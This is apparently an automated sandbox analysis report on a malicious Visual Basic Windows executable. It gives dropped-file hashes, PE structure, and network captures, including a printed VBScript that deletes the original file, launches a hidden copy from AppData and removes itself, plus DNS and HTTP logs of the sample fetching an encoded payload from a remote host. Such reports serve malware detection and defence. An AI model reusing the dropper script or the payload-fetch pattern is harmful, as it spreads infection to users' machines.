                      Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.e.s.k.t.o.p.\.m.U.9.H.9.6.i.g.b.3...e.x.e."...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.A.d.o.b.e.s.\.D.l.l.s...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                      C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Process:C:\Users\user\Desktop\mU9H96igb3.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):208896
                      Entropy (8bit):4.14906794472717
                      Encrypted:false
                      SSDEEP:1536:tTEDegofhrRAnvzYFBWigYcgkOwijQkwY+EhBKDID:tQeZpR47YeigqVX+SK8
                      MD5:8777020A37B6797241A489A707B9784B
                      SHA1:A1ED1029B967295F9CE5E9D219F41DC6C7FC4D1A
                      SHA-256:8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
                      SHA-512:0A9D13CA582DD72B4CDCE8C91A5226AEB8C70AC7A73FA5F9775C6D03753BF7EC856371F55BF5F5E38F0A1D84E375C80916E5508F89D91E7100A82C4E544174D8
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Metadefender, Detection: 26%, Browse
                      • Antivirus: ReversingLabs, Detection: 24%
                      Joe Sandbox View:
                      • Filename: destinations.xlsx, Detection: malicious, Browse
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......R.....................P......|.............@..........................@..............................................$...(.......&%..................................................................0... ....................................text............................... ..`.data...............................@....rsrc...&%.......0..................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\Adobes\Dlls.exe:Zone.Identifier
                      Process:C:\Users\user\Desktop\mU9H96igb3.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview: [ZoneTransfer]....ZoneId=0
                      C:\Users\user\AppData\Roaming\Adobes\logs.dat
                      Process:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):148
                      Entropy (8bit):6.691013798377593
                      Encrypted:false
                      SSDEEP:3:5qkf/XzwQgv5EywfxD854QK1i5rh/YsXfGsOitgZy/EMC2n:0avzwh5w5D854fi5VYW+90gZWEMC2n
                      MD5:52BD8DA216638819E4B90406FC3BEE69
                      SHA1:78123C6321924C49B30D450676C9C6D1B03E8021
                      SHA-256:65BFFFA1AB9AC107A5827D180F240F501DD289B8298D0E4A3A9A8758BDB98173
                      SHA-512:9EEC64AC0A3A2B82727DC04C2CE15978B380C37DE05FD90FA1F6EC41ED3046EFAF82E8A7A7364CEFC0F35C5D84BC89A365E1B868EF6308DCAF44DD4083787FAD
                      Malicious:false
                      Preview: . \...wL...../g)a....V.D..k..-5..f..\..px..;i.....#.+....U.+...7.}.@B!=X./..R.Q..C.....::..+.9`......nt.n7[.X..h.+=i.Bc........<"+.-..E_>E.k2.,.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):4.14906794472717
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.15%
                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:mU9H96igb3.exe
                      File size:208896
                      MD5:8777020a37b6797241a489a707b9784b
                      SHA1:a1ed1029b967295f9ce5e9d219f41dc6c7fc4d1a
                      SHA256:8a45d901cab57a1b65c32aea2452f56436dcf01c37bdf7875838e6054f395d90
                      SHA512:0a9d13ca582dd72b4cdce8c91a5226aeb8c70ac7a73fa5f9775c6d03753bf7ec856371f55bf5f5e38f0a1d84e375c80916e5508f89d91e7100a82c4e544174d8
                      SSDEEP:1536:tTEDegofhrRAnvzYFBWigYcgkOwijQkwY+EhBKDID:tQeZpR47YeigqVX+SK8
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......R.....................P......|.............@........

                      File Icon

                      Icon Hash:20047c7c70f0e004

                      Static PE Info

                      General

                      Entrypoint:0x40137c
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x52EAF782 [Fri Jan 31 01:08:18 2014 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:5daabd92eded5d2026efd3adb9b442c0

                      Entrypoint Preview

                      Instruction
                      push 0040171Ch
                      call 00007F5CB0495DD5h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      dec eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ebx+79h], cl
                      adc eax, EE6C2F36h
                      inc ecx
                      mov bh, byte ptr [ecx-19h]
                      and al, 3Dh
                      pop eax
                      xchg eax, edi
                      push 00000000h
                      add byte ptr [eax], al
                      add dword ptr [eax], eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      nop
                      stosb
                      xlatb
                      add cl, byte ptr [eax+69h]
                      insb
                      bound esi, dword ptr fs:[edx+61h]
                      outsb
                      jnc 00007F5CB0495E4Fh
                      imul esp, dword ptr [ebp+64h], 41070036h
                      add ah, al
                      stosb
                      xlatb
                      add al, byte ptr [eax]
                      add byte ptr [eax], al
                      add bh, bh
                      int3
                      xor dword ptr [eax], eax
                      add al, 2Ch
                      xor dword ptr [esi+20h], ebp
                      fcom st(0), st(0)
                      movsd
                      inc esi
                      mov byte ptr [esi-18h], dh
                      dec ebp
                      adc dword ptr [edx+esi*2], 3433C456h
                      cmc
                      mov esi, DC9142B1h
                      inc esp
                      mov edx, 960E1019h
                      cmp cl, byte ptr [edi-53h]
                      xor ebx, dword ptr [ecx-48EE309Ah]
                      or al, 00h
                      stosb
                      add byte ptr [eax-2Dh], ah
                      xchg eax, ebx
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      test dword ptr [eax], 00510000h
                      add byte ptr [eax], al
                      add byte ptr [edi], al
                      add byte ptr [edi+ecx*2+57h], dl
                      dec ebp
                      dec edi
                      dec esi
                      push esp
                      add byte ptr [00000F01h], cl

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0240x28.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000x2526.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x10c.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x2d4840x2e000False0.23853069803data4.22024266439IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .data0x2f0000x13ec0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x310000x25260x3000False0.168375651042data2.83539382363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      CUSTOM0x32c680x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                      CUSTOM0x323aa0x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                      CUSTOM0x320ac0x2feMS Windows icon resource - 1 icon, 32x32, 4 colorsEnglishUnited States
                      CUSTOM0x31dae0x2feMS Windows icon resource - 1 icon, 32x32, 4 colorsEnglishUnited States
                      CUSTOM0x31ab00x2feMS Windows icon resource - 1 icon, 32x32, 4 colorsEnglishUnited States
                      RT_ICON0x319800x130data
                      RT_ICON0x316980x2e8data
                      RT_ICON0x315700x128GLS_BINARY_LSB_FIRST
                      RT_GROUP_ICON0x315400x30data
                      RT_VERSION0x312600x2e0dataEnglishUnited States

                      Imports

                      DLLImport
                      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaBoolStr, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                      Version Infos

                      DescriptionData
                      Translation0x0409 0x04b0
                      LegalCopyrightSoftware Inc.
                      InternalNamePattes5
                      FileVersion1.00
                      CompanyNameUnions Inc.
                      LegalTrademarksUnions Software
                      ProductNameUnions Inc.
                      ProductVersion1.00
                      FileDescriptionUnions Inc.
                      OriginalFilenamePattes5.exe

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2021 08:38:58.565859079 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.586316109 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.586524010 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.586767912 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.606988907 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608710051 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608823061 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608846903 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608859062 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608870983 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608881950 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608897924 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608910084 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608921051 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.608932018 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.609111071 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.609122992 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.609126091 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.609293938 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.629517078 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629602909 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629616022 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629628897 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629648924 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629659891 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629672050 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629690886 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629702091 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629714012 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629753113 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629764080 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629775047 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629796982 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629807949 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629818916 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.629818916 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629825115 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.629829884 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629858017 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629864931 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.629870892 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.629992008 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.630042076 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.630048037 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.630218983 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.650433064 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.650592089 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.650734901 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.650789022 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.650834084 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.650852919 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.650857925 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.650962114 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651007891 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651052952 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651098013 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651098013 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651130915 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651144981 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651216984 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651263952 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651309967 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651355028 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651400089 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651431084 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651446104 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651447058 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651492119 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651536942 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651582956 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651592016 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651608944 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651628971 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651674032 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651719093 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651763916 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651779890 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651789904 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651798010 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651808977 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651854992 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651900053 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651945114 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.651959896 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.651989937 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652034998 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652079105 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652123928 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652126074 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.652147055 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.652154922 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.652168989 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652215004 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652259111 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652299881 CEST4980480192.168.11.2083.167.224.147
                      Oct 14, 2021 08:38:58.652304888 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652353048 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652398109 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652442932 CEST804980483.167.224.147192.168.11.20
                      Oct 14, 2021 08:38:58.652476072 CEST4980480192.168.11.2083.167.224.147

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2021 08:38:58.541471004 CEST5677953192.168.11.201.1.1.1
                      Oct 14, 2021 08:38:58.556871891 CEST53567791.1.1.1192.168.11.20
                      Oct 14, 2021 08:40:32.070306063 CEST6128853192.168.11.201.1.1.1
                      Oct 14, 2021 08:40:32.224752903 CEST53612881.1.1.1192.168.11.20

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Oct 14, 2021 08:38:58.541471004 CEST192.168.11.201.1.1.10x6ec8Standard query (0)implantecapilarpereira.comA (IP address)IN (0x0001)
                      Oct 14, 2021 08:40:32.070306063 CEST192.168.11.201.1.1.10x7e78Standard query (0)Venonletmonitprradministratioran.loseyourip.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Oct 14, 2021 08:38:58.556871891 CEST1.1.1.1192.168.11.200x6ec8No error (0)implantecapilarpereira.com83.167.224.147A (IP address)IN (0x0001)
                      Oct 14, 2021 08:40:32.224752903 CEST1.1.1.1192.168.11.200x7e78No error (0)Venonletmonitprradministratioran.loseyourip.com8.6.8.23A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • implantecapilarpereira.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.11.204980483.167.224.14780C:\Users\user\Desktop\mU9H96igb3.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:38:58.586767912 CEST6297OUTGET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: implantecapilarpereira.com
                      Cache-Control: no-cache
                      Oct 14, 2021 08:38:58.608710051 CEST6299INHTTP/1.1 200 OK
                      Date: Thu, 14 Oct 2021 06:38:58 GMT
                      Server: Apache
                      Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT
                      Accept-Ranges: bytes
                      Content-Length: 470592
                      Content-Type: application/octet-stream
                      Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b
                      Data Ascii: 1X^\J?V|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f|F3|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WE*I_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:*65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.11.204980883.167.224.14780C:\Users\user\Desktop\mU9H96igb3.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:40:31.900110006 CEST6786OUTGET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1
